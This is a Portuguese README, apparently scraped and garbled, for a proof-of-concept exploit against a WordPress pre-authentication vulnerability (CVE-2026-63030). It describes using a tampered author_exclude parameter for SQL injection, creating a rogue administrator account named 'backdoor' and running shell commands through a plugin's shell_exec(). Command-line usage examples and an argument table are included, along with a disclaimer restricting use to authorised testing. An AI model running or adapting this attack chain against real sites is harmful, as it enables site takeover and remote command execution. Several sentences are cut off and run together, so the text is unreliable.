
Exploit de prova de conceito para CVE-2026-63030, uma vulnerabilidade de pré-autenticação no WordPress (versões 6.9.0 a 7.0.1).
Prova de conceito do exploit para CVE-2026-63030, uma vulnerabilidade de pré-autenticação no WordPress (versões 6.9.0 até 7.0.1). Ela encadeia:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Exploração automática com credenciais de administrador aleatórias e executa 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Administrador e comando personalizados
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude adulterado, explorando a confusão de rotas para executar uma consulta UNION.shell_exec().Isto é apenas uma prova de conceito.
Destina-se a:
Não use contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar. Os autores não assumem nenhuma responsabilidade por uso indevido.
wp-config.php endurecido, a SQLi pode falhar.DISALLOW_FILE_MODS e DISALLOW_UNFILTERED_HTML na configuração do alvo.| Argumento | Descrição |
|---|
--url | URL raiz do WordPress alvo (obrigatório) |
--username | Nome de usuário administrador a criar (gerado automaticamente se omitido) |
--password | Senha do administrador (gerada automaticamente se omitida) |
--email | E-mail do administrador (gerado automaticamente se omitido) |
--command, -c | Comando a executar via plugin (padrão: id) |
--post-id | Especificar um ID de post publicado (detectado automaticamente se omitido) |
--timeout | Tempo limite de HTTP em segundos (padrão: 60) |